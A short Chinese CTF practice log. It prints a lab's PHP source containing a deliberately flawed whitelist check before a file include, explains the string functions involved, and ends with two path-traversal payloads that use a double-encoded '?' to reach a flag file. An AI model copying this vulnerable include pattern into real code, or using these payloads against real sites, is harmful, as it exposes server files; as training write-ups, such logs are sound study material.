ctf练习记录第一天
打开靶机:
滑稽:)
顺手f12一下:
哦吼,发现了什么?
滑稽上面出现一段php代码:
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
好,然后就是php代码审计了:)
这里我们可以看到如果file的文件不为空并且是字符串,还经过emmm类的checkFile函数过滤后就执行文件包含,需要包含的文件就是源码中出现的hint.php中的文件:
然后继续审计emmm中的代码:
其中:
mb_substr()函数返回字符串的一部分
mb_strpos()查找字符串在另一个字符串中首次出现的位置
urldecode()用于解码给出的已编码字符串中的任何%##以及中文等被编码的内容。
in_array()搜索数组中是否存在指定的值
这里的意思是传入一个值然后返回字符串的一部分,判断其是否在白名单中,url解码后再过滤一次,如果最后返回true,就可以包含文件。
然后构造payload:
/?file=source.php%253F../../../../../ffffllllaaaagggg
/?file=hint.php%253F../../../../../ffffllllaaaagggg